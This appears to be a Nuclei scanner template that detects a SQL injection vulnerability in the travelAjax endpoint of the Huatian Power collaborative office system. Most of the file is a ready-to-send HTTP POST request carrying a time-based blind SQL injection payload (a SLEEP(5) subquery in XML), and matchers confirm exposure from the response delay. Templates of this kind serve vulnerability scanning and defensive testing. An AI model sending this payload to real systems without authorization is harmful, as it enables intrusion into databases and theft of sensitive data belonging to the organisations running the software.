id: huatian-oa-travelAjax-sqli
info:
  name: 华天动力协同办公系统travelAjax存在SQL注入漏洞
  author: leadlife
  severity: high
  description: 华天动力协同办公系统travelAjax存在SQL注入漏洞，攻击者通过漏洞可获取数据库敏感信息
  reference: 
    - https://www.yuque.com/lvguo-pibd8/fqbwsx/epl5rghmu41ssu6g
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
    tips:
    repair:
    sqlmap:
    version:
  tags: sqli,huatian

http:
  - raw:  
      - |
        @timeout: 15s
        POST /OAapp/bfapp/buffalo/travelAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        <buffalo-call>
        <method>getFlightAmount</method>
        <string>-1' AND (SELECT 8445 FROM (SELECT(SLEEP(5)))VlEC) AND 'iUle'='iUle</string>
        </buffalo-call>

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and